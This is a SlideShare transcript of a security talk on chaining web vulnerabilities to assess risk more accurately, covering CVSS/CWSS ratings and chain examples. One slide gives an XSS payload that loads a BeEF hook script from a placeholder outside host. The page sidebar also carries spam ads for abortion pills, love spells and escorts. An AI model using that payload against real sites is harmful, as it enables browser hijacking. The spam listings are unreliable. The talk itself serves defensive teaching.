SlideShare a Scribd company logo
1 of 21
Using Vuln Chaining and Other
Factors for a Better Risk
Perspective
By Curtis Brazzell (Say Hi @curtbraz on Twitter/LinkedIn/Gmail!)
About Me?
ď‚š Interested in computers/security from an early age
ď‚š Former DBA/Sys Admin (4-6 years)
ď‚š Security field for 10+ years (mostly consulting)
ď‚š Sr SOC Analyst
ď‚š DFIR Lead (Malware Analysis)
ď‚š AppSec/Pentesting/Red Team
ď‚š Currently an MSC for GuidePoint Security on the AppSec (Tactical) Team
ď‚š Passionate about anything security (especially phishing!)
 Want to be known for research/tool contributions (known instead for …. )
ď‚š Like to try to put a new spin on old topics
Severity Ratings
ď‚š Importance for accuracy to understand risk
ď‚š Can be subjective
ď‚š Should be challenged!
ď‚š Context is everything!
ď‚š Unique environments
ď‚š External/Internal
ď‚š Pre-Auth/Auth
ď‚š Roles/Permissions/Privileges
ď‚š Exploitability
ď‚š Compensating controls / mitigations
ď‚š CVSS/CWSS
Severity Ratings
ď‚š Common Vulnerability Scoring System (CVSS)
ď‚š Open Framework
ď‚š Three metric groups:
ď‚š Base (What you get by default from most vuln scanners using the NVD)
ď‚š Temporal (Metrics that change over time due to external events)
ď‚š Environmental (Impact of the vuln on your org)
CVSS v3.0 Ratings
Severity Base Score Range
None 0.0
Low 0.1-3.9
Medium 4.0-6.9
High 7.0-8.9
Critical 9.0-10.0
Severity Ratings
ď‚š Common Weakness Scoring System (CWSS)
ď‚š Can be used in conjunction with the Common Weakness Risk Analysis Framework (CWRAF)
ď‚š Three metric groups:
ď‚š Base (Inherent risk, confidence, and strength on controls)
ď‚š Attack Surface (Barriers an attacker must overcome to exploit)
ď‚š Environmental (Characteristics that are specific to an environment/context)
ď‚š Ranges between 0 and 100
Getting it Wrong
ď‚š Getting Impact, likelihood of attack, or exploitability wrong (also subjective)
ď‚š Missing vulnerabilities or not taking the vuln far enough
ď‚š Lack of experience (bug bounties, new hires, etc)
ď‚š Lack of time
ď‚š Misunderstanding of the environment
ď‚š Industry
ď‚š What the app does
ď‚š Ask for demos!
ď‚š May be a non-issue even
ď‚š Dangers of getting it wrong
 Too low and it doesn’t get prioritized / risk isn’t acknowledged
 Too high and you take priority from more important issues / dev time / other resources / client or app’s reputation
Vuln Chaining 101
ď‚š Combining vulnerabilities for a greater impact!
ď‚š More than one lower-serverity issue may be combined for a higher risk rating
 Vulns don’t live in a vacuum!
ď‚š Examples:
Vuln Chaining (Examples)
Cross-Site Scripting (XSS) Unprotected Session Cookie
Medium Low
High
OR Local Storage Session
Low
Session Hijacking/Account Takeover
Credit to blog.ropnop.com/storing-tokens-in-browser
Vuln Chaining (Examples)
Cross-Site Scripting (XSS) CORS/CSP Misconfiguration Sensitive Data Leakage / 3P Scripts (Beef)
Medium High
Medium
XSS Payload = <script src=“thirdpartydomain/hook.js”>
Vuln Chaining (Examples)
Header Injection Duplicate Headers / Newline Chars Cross-Site Scripting / Host Poisoning, etc
High
Medium
High
Adding newline characters to break into the body or cut off / duplicate headers
Vuln Chaining (Examples)
Low
High
Low
Session Token in URL /
Password Submission
Low
Session Hijacking/Account Takeover
Missing HSTS Enforcement
No Secure Flag
Vuln Chaining (Examples)
Low
High
Low
Session Fixation
Low
Unauthorized Access via Session Hijacking or Unattended Session
No or Long Session Timeout Concurrent User Sessions
Vuln Chaining (Examples)
Unrestricted File Uploads Authorization Issues (No Auth) XSS/Form Jacking/Open Redirects
Medium Low High
With Auth SSRF/RCE/XXE
High
OR
& IDOR
Vuln Chaining
 Where’s the documentation?
ď‚š If I come across a vuln, how do I know what others to look for?
 Experienced people “just know” from memory
ď‚š Individual ones (like the previous examples) are often on blogs and public bug bounty reports
ď‚š My Idea / Contribution / Project..
ď‚š Create a community-driven open resource!
ď‚š Why am I doing this?
Vuln Chaining (Mind Map PoC)
OR
Vuln Chaining (Mind Map PoC)
https://atlas.mindmup.com/2021/10/
aa8b215037f611ecbbbb01ecf8fc07de
/vuln_chain/index.html
I published at
Vuln Chaining (Relational Database)
Vuln Chaining (Practical Uses)
ď‚š Used by an AppSec resource for more accurate assessments
ď‚š Educational Resource / Training | Better Bug Bounties
ď‚š Used by an internal org for threat modeling self-assessments
ď‚š Examples of use:
Vuln Chaining (Web Form)
Other Uses and Closing Thoughts
ď‚š Could be implemented as a tool to import a CSV template (think compliance)
ď‚š Would love to see integration into vuln scanners by default
ď‚š Burp Extender plugin FTW! (Any takers?)
ď‚š Cool card game? (Think Backdoors & Breaches or the OWASP deck)
Thank You! Questions?
 We’re hiring AppSec folks at GuidePoint Security!
ď‚š Tactical and Strategic Services

More Related Content

Similar to Using Vuln Chaining and Other Factors for a Better Risk Perspective

Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
DefCamp
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learning
Bryan Fendley
 
302 Content Server Security Challenges And Best Practices
302   Content Server Security   Challenges And Best Practices302   Content Server Security   Challenges And Best Practices
302 Content Server Security Challenges And Best Practices
phanleson
 

Similar to Using Vuln Chaining and Other Factors for a Better Risk Perspective (20)

Thinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and PreventionThinking Differently About Security Protection and Prevention
Thinking Differently About Security Protection and Prevention
 
BSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability ManagementBSidesJXN 2017 - Improving Vulnerability Management
BSidesJXN 2017 - Improving Vulnerability Management
 
Including security in devops
Including security in devopsIncluding security in devops
Including security in devops
 
Owasp top 10_openwest_2019
Owasp top 10_openwest_2019Owasp top 10_openwest_2019
Owasp top 10_openwest_2019
 
Health Information Privacy and Security
Health Information Privacy and SecurityHealth Information Privacy and Security
Health Information Privacy and Security
 
Raging Ransomware Roadshow May
Raging Ransomware Roadshow MayRaging Ransomware Roadshow May
Raging Ransomware Roadshow May
 
Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?Vulnerability Ass... Penetrate What?
Vulnerability Ass... Penetrate What?
 
Digital Immunity -The Myths and Reality
Digital Immunity -The Myths and RealityDigital Immunity -The Myths and Reality
Digital Immunity -The Myths and Reality
 
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012Social Enterprise Rises! …and so are the Risks - DefCamp 2012
Social Enterprise Rises! …and so are the Risks - DefCamp 2012
 
This is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept XThis is Next-Gen IT Security - Introducing Intercept X
This is Next-Gen IT Security - Introducing Intercept X
 
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
Sophos Day Belgium - This is Next-Gen IT Security (Sophos Intercept X)
 
Fendley how secure is your e learning
Fendley how secure is your e learningFendley how secure is your e learning
Fendley how secure is your e learning
 
302 Content Server Security Challenges And Best Practices
302   Content Server Security   Challenges And Best Practices302   Content Server Security   Challenges And Best Practices
302 Content Server Security Challenges And Best Practices
 
Security Best Practices
Security Best PracticesSecurity Best Practices
Security Best Practices
 
Understanding Application Threat Modelling & Architecture
 Understanding Application Threat Modelling & Architecture Understanding Application Threat Modelling & Architecture
Understanding Application Threat Modelling & Architecture
 
Android App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSecAndroid App Hacking - Erez Metula, AppSec
Android App Hacking - Erez Metula, AppSec
 
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
Don't Drop the SOAP: Real World Web Service Testing for Web Hackers
 
OWASP Secure Coding
OWASP Secure CodingOWASP Secure Coding
OWASP Secure Coding
 
DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0DTS Solution - Penetration Testing Services v1.0
DTS Solution - Penetration Testing Services v1.0
 
SensePost Threat Modelling
SensePost Threat ModellingSensePost Threat Modelling
SensePost Threat Modelling
 

More from Curtis Brazzell

More from Curtis Brazzell (6)

Beyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of CybersecurityBeyond Passwords: The Future of Cybersecurity
Beyond Passwords: The Future of Cybersecurity
 
2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell2020 KringleCon HolidayHack Report - Brazzell
2020 KringleCon HolidayHack Report - Brazzell
 
Phishing 101
Phishing 101Phishing 101
Phishing 101
 
A Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security ClubA Night of Phishing @ IUPUI Cyber Security Club
A Night of Phishing @ IUPUI Cyber Security Club
 
2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable2019 SANS Holiday Hack Challenge Deliverable
2019 SANS Holiday Hack Challenge Deliverable
 
One, Two... Vulns are Coming for You
One, Two... Vulns are Coming for YouOne, Two... Vulns are Coming for You
One, Two... Vulns are Coming for You
 

Recently uploaded

Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Medical / Health Care (+971588192166) Mifepristone and Misoprostol tablets 200mg
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
masabamasaba
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
masabamasaba
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
VictorSzoltysek
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
masabamasaba
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
masabamasaba
 

Recently uploaded (20)

Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
Abortion Pill Prices Tembisa [(+27832195400*)] 🏥 Women's Abortion Clinic in T...
 
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
%+27788225528 love spells in Huntington Beach Psychic Readings, Attraction sp...
 
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
Shapes for Sharing between Graph Data Spaces - and Epistemic Querying of RDF-...
 
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
call girls in Vaishali (Ghaziabad) 🔝 >༒8448380779 🔝 genuine Escort Service 🔝✔️✔️
 
Right Money Management App For Your Financial Goals
Right Money Management App For Your Financial GoalsRight Money Management App For Your Financial Goals
Right Money Management App For Your Financial Goals
 
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdfPayment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
Payment Gateway Testing Simplified_ A Step-by-Step Guide for Beginners.pdf
 
tonesoftg
tonesoftgtonesoftg
tonesoftg
 
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT  - Elevating Productivity in Today's Agile EnvironmentHarnessing ChatGPT  - Elevating Productivity in Today's Agile Environment
Harnessing ChatGPT - Elevating Productivity in Today's Agile Environment
 
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
%+27788225528 love spells in Atlanta Psychic Readings, Attraction spells,Brin...
 
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
%in Stilfontein+277-882-255-28 abortion pills for sale in Stilfontein
 
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
%in Hazyview+277-882-255-28 abortion pills for sale in Hazyview
 
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
WSO2Con2024 - From Code To Cloud: Fast Track Your Cloud Native Journey with C...
 
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM TechniquesAI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
AI Mastery 201: Elevating Your Workflow with Advanced LLM Techniques
 
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
W01_panagenda_Navigating-the-Future-with-The-Hitchhikers-Guide-to-Notes-and-D...
 
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
%+27788225528 love spells in Knoxville Psychic Readings, Attraction spells,Br...
 
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
WSO2CON 2024 - Cloud Native Middleware: Domain-Driven Design, Cell-Based Arch...
 
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park %in ivory park+277-882-255-28 abortion pills for sale in ivory park
%in ivory park+277-882-255-28 abortion pills for sale in ivory park
 
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
%+27788225528 love spells in Boston Psychic Readings, Attraction spells,Bring...
 
AI & Machine Learning Presentation Template
AI & Machine Learning Presentation TemplateAI & Machine Learning Presentation Template
AI & Machine Learning Presentation Template
 
%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand%in Midrand+277-882-255-28 abortion pills for sale in midrand
%in Midrand+277-882-255-28 abortion pills for sale in midrand
 

Using Vuln Chaining and Other Factors for a Better Risk Perspective

  • 1. Using Vuln Chaining and Other Factors for a Better Risk Perspective By Curtis Brazzell (Say Hi @curtbraz on Twitter/LinkedIn/Gmail!)
  • 2. About Me? ď‚š Interested in computers/security from an early age ď‚š Former DBA/Sys Admin (4-6 years) ď‚š Security field for 10+ years (mostly consulting) ď‚š Sr SOC Analyst ď‚š DFIR Lead (Malware Analysis) ď‚š AppSec/Pentesting/Red Team ď‚š Currently an MSC for GuidePoint Security on the AppSec (Tactical) Team ď‚š Passionate about anything security (especially phishing!) ď‚š Want to be known for research/tool contributions (known instead for …. ) ď‚š Like to try to put a new spin on old topics
  • 3. Severity Ratings ď‚š Importance for accuracy to understand risk ď‚š Can be subjective ď‚š Should be challenged! ď‚š Context is everything! ď‚š Unique environments ď‚š External/Internal ď‚š Pre-Auth/Auth ď‚š Roles/Permissions/Privileges ď‚š Exploitability ď‚š Compensating controls / mitigations ď‚š CVSS/CWSS
  • 4. Severity Ratings ď‚š Common Vulnerability Scoring System (CVSS) ď‚š Open Framework ď‚š Three metric groups: ď‚š Base (What you get by default from most vuln scanners using the NVD) ď‚š Temporal (Metrics that change over time due to external events) ď‚š Environmental (Impact of the vuln on your org) CVSS v3.0 Ratings Severity Base Score Range None 0.0 Low 0.1-3.9 Medium 4.0-6.9 High 7.0-8.9 Critical 9.0-10.0
  • 5. Severity Ratings ď‚š Common Weakness Scoring System (CWSS) ď‚š Can be used in conjunction with the Common Weakness Risk Analysis Framework (CWRAF) ď‚š Three metric groups: ď‚š Base (Inherent risk, confidence, and strength on controls) ď‚š Attack Surface (Barriers an attacker must overcome to exploit) ď‚š Environmental (Characteristics that are specific to an environment/context) ď‚š Ranges between 0 and 100
  • 6. Getting it Wrong ď‚š Getting Impact, likelihood of attack, or exploitability wrong (also subjective) ď‚š Missing vulnerabilities or not taking the vuln far enough ď‚š Lack of experience (bug bounties, new hires, etc) ď‚š Lack of time ď‚š Misunderstanding of the environment ď‚š Industry ď‚š What the app does ď‚š Ask for demos! ď‚š May be a non-issue even ď‚š Dangers of getting it wrong ď‚š Too low and it doesn’t get prioritized / risk isn’t acknowledged ď‚š Too high and you take priority from more important issues / dev time / other resources / client or app’s reputation
  • 7. Vuln Chaining 101 ď‚š Combining vulnerabilities for a greater impact! ď‚š More than one lower-serverity issue may be combined for a higher risk rating ď‚š Vulns don’t live in a vacuum! ď‚š Examples:
  • 8. Vuln Chaining (Examples) Cross-Site Scripting (XSS) Unprotected Session Cookie Medium Low High OR Local Storage Session Low Session Hijacking/Account Takeover Credit to blog.ropnop.com/storing-tokens-in-browser
  • 9. Vuln Chaining (Examples) Cross-Site Scripting (XSS) CORS/CSP Misconfiguration Sensitive Data Leakage / 3P Scripts (Beef) Medium High Medium XSS Payload = <script src=“thirdpartydomain/hook.js”>
  • 10. Vuln Chaining (Examples) Header Injection Duplicate Headers / Newline Chars Cross-Site Scripting / Host Poisoning, etc High Medium High Adding newline characters to break into the body or cut off / duplicate headers
  • 11. Vuln Chaining (Examples) Low High Low Session Token in URL / Password Submission Low Session Hijacking/Account Takeover Missing HSTS Enforcement No Secure Flag
  • 12. Vuln Chaining (Examples) Low High Low Session Fixation Low Unauthorized Access via Session Hijacking or Unattended Session No or Long Session Timeout Concurrent User Sessions
  • 13. Vuln Chaining (Examples) Unrestricted File Uploads Authorization Issues (No Auth) XSS/Form Jacking/Open Redirects Medium Low High With Auth SSRF/RCE/XXE High OR & IDOR
  • 14. Vuln Chaining ď‚š Where’s the documentation? ď‚š If I come across a vuln, how do I know what others to look for? ď‚š Experienced people “just know” from memory ď‚š Individual ones (like the previous examples) are often on blogs and public bug bounty reports ď‚š My Idea / Contribution / Project.. ď‚š Create a community-driven open resource! ď‚š Why am I doing this?
  • 15. Vuln Chaining (Mind Map PoC) OR
  • 16. Vuln Chaining (Mind Map PoC) https://atlas.mindmup.com/2021/10/ aa8b215037f611ecbbbb01ecf8fc07de /vuln_chain/index.html I published at
  • 18. Vuln Chaining (Practical Uses) ď‚š Used by an AppSec resource for more accurate assessments ď‚š Educational Resource / Training | Better Bug Bounties ď‚š Used by an internal org for threat modeling self-assessments ď‚š Examples of use:
  • 20. Other Uses and Closing Thoughts ď‚š Could be implemented as a tool to import a CSV template (think compliance) ď‚š Would love to see integration into vuln scanners by default ď‚š Burp Extender plugin FTW! (Any takers?) ď‚š Cool card game? (Think Backdoors & Breaches or the OWASP deck)
  • 21. Thank You! Questions? ď‚š We’re hiring AppSec folks at GuidePoint Security! ď‚š Tactical and Strategic Services